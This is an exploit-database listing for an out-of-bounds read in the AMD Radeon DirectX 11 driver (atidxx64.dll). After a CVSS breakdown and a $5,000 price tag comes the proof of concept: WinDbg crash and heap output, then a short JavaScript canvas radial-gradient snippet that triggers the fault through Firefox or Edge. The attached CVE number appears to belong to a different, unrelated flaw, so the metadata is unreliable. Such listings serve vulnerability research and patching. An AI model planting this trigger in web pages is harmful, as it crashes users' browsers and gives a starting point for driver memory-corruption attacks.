Exploitalert - Database of Exploits

AMD Radeon DirectX 11 Driver 8.17.10.0871 Memory Corruption

CVE	Category	Price	Severity
CVE-2020-0543	CWE-119	$5,000	Critical

Author	Risk	Exploitation Type	Date
Anonymous	High	Local	2020-04-26

CVSS	EPSS	EPSSP
CVSS:7.8/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Local	AV	The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	Low	PR	The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope		S	An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

https://cxsecurity.com/ascii/WLB-2020040150

AMD Radeon DirectX 11 Driver 8.17.10.0871 Memory Corruption

/* Title : Advanced Micro Devices, Inc. Radeon DirectX 11 Driver (Firefox/MS Edge) Memory Corruption Date : 10.04.2020 Exploit Author : Marcin Ressel Vendor Homepage : https://www.amd.com/ Software Link: n/a Version: 8.17.10.0871 (atidxx64.dll) Tested on: Windows 10 home, AMD64 Family 23 Model 24 Stepping 1 AuthenticAMD ~2100 Mhz, Firefox 74.0 (64 bity) MS Edge ---- 24a5122ef60 - 24a512270f0 = 0x7E70 && 0x7f10 - 0x7E70 = A0 = offset = OUT_OF_BOUNDS READ ---- 0:123> g (2560.1f28): Access violation - code c0000005 (!!! second chance !!!) atidxx64!AmdDxGsaFreeCompiledShader+0x45901d: 00007ffc`994cfecd 83bba000000013 cmp dword ptr [rbx+0A0h],13h ds:0000024a`5122f000=???????? 0:123> !heap -p -a @rbx 24a512270f0 address 0000024a5122ef60 found in _DPH_HEAP_ROOT @ 24a50701000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 24a653f10d0: 24a512270f0 7f10 - 24a51227000 9000 00007ffca7204847 ntdll!RtlDebugAllocateHeap+0x000000000000003f 00007ffca71b4a16 ntdll!RtlpAllocateHeap+0x0000000000077b26 00007ffca713babb ntdll!RtlpAllocateHeapInternal+0x00000000000001cb 00007ffc99378a05 atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000301b55 00007ffc996af263 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000006383b3 00007ffc996ae802 atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000637952 00007ffc993e9891 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000003729e1 00007ffc9917a7db atidxx64!AmdDxGsaFreeCompiledShader+0x000000000010392b 00007ffc9917949b atidxx64!AmdDxGsaFreeCompiledShader+0x00000000001025eb 00007ffc99169680 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000f27d0 00007ffc99148e8a atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000d1fda 00007ffc990951f4 atidxx64!AmdDxGsaFreeCompiledShader+0x000000000001e344 00007ffc998509ce atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007d9b1e 00007ffc9984b950 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007d4aa0 00007ffc99826a26 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007afb76 00007ffc990aedcb atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000037f1b 00007ffc990ae6a9 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000377f9 00007ffc99952114 atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0x00000000000a4654 00007ffca6747bd4 KERNEL32!BaseThreadInitThunk+0x0000000000000014 00007ffca716ced1 ntdll!RtlUserThreadStart+0x0000000000000021 0:123> kb # RetAddr : Args to Child : Call Site 00 00007ffc`994b4f3e : 0000024a`5122db98 0000024a`50dcef01 0000024a`5c27b600 0000024a`51228650 : atidxx64!AmdDxGsaFreeCompiledShader+0x45901d 01 00007ffc`99166094 : 0000024a`00000000 0000024a`00000000 0000024a`51211fc0 00000056`0743ec89 : atidxx64!AmdDxGsaFreeCompiledShader+0x43e08e 02 00007ffc`9917a1d3 : 0000024a`5122db80 0000024a`51211fc0 0000024a`0000002d 0000024a`51211fc0 : atidxx64!AmdDxGsaFreeCompiledShader+0xef1e4 03 00007ffc`99169680 : 0000024a`60901a50 0000024a`50e63108 00000000`00000002 0000024a`60901a50 : atidxx64!AmdDxGsaFreeCompiledShader+0x103323 04 00007ffc`99148e8a : 0000024a`60901a50 0000024a`50ddb1f0 0000024a`50dd6400 0000024a`60901a50 : atidxx64!AmdDxGsaFreeCompiledShader+0xf27d0 05 00007ffc`990951f4 : 00000000`00000001 0000024a`50dd6400 0000024a`50ddb1f0 0000024a`50ae0ec0 : atidxx64!AmdDxGsaFreeCompiledShader+0xd1fda 06 00007ffc`998509ce : 00000000`00000000 00000056`0743f5a0 0000024a`50dd6400 0000024a`5085c4c0 : atidxx64!AmdDxGsaFreeCompiledShader+0x1e344 07 00007ffc`9984b950 : 0000024a`00000000 0000024a`507d7d08 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7d9b1e 08 00007ffc`99826a26 : 00000000`00000000 00000000`00000000 0000024a`50cfafe0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7d4aa0 09 00007ffc`990aedcb : 0000024a`50cfafe0 00000000`00000000 0000024a`5dc8ffd0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7afb76 0a 00007ffc`990ae6a9 : 00000000`00000000 0000024a`57423fd0 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x37f1b 0b 00007ffc`99952114 : 0000024a`57423fd0 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x377f9 0c 00007ffc`a6747bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0xa4654 0d 00007ffc`a716ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14 0e 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21 */ var canvas=document.createElement("canvas"); document.body.appendChild(canvas); var context = canvas.getContext("2d") function radioActiveGradient() { var ret = context.createRadialGradient(1,1,0,1,0.6898449305444956,1); ret.addColorStop(0,"rgb(1,1,1)"); return ret; } context.arc(1,0.6898449305444956,1,0,1); context.strokeStyle=radioActiveGradient(); context.stroke()

Impressum